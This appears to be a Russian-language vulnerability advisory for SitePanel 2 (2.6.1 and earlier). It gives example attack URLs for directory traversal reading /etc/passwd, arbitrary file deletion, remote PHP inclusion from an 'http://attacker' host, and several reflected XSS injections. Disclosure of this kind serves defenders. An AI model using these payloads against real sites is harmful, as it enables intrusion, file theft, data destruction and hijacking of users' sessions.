Программа: SitePanel 2 2.6.1 и более ранние версии

Уязвимости позволяют удаленному
пользователю выполнить произвольные PHP
сценарии, просмотреть файлы на системе и
произвести XSS нападение.

1. Обход каталога возможен из-за
недостаточной обработки параметра lang.
Удаленный пользователь может с помощью
специально сформированного URL просмотреть
произвольные файлы на системе.

Пример:

http://[target]/users/index.php?lang=en.inc /../../../../../../etc/pa sswd%00

2. Удаленный авторизованный пользователь
может также удалить произвольные файлы на
системе. Пример:

http://[target]/admin/5.php?do=rmattach&rm= yes&id=../index.php

3. Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный PHP сценарий на целевой системе
с привилегиями web сервера.

Пример:

http://[target]/users/main.php?p= http://attacker

4. Межсайтовый скриптинг возможен из-за
недостаточной фильтрации входных данных.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.

Пример:

http://[target]/users/main.php?p =5&do=2&v= 177%22%3E[XSS]
http://[target]/admin/5.php?do=chsev&postid= 177&usernamess=test&inadmin=no%22%3E[XSS]
http://[target]/admin/5.php?do=chsev2&postid= 177&username ss=test&inadmin=no&newsev=4%22%3E[XSS]
http://[target]/admin/5.php?do=chsev&postid=177% 22%3E[XSS]&usernamess=test&inadmin=no
http://[target]/users/main.php?p=5&do=0& show=closed%22%3E[XSS]
http://[target]/admin/0.php?do=ratekb&id= 11%22%3E[XSS]
http://[target]/users/main.php?p=6&do=0&v= post&id=11&sec_name=Blah%22%3E[XSS]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии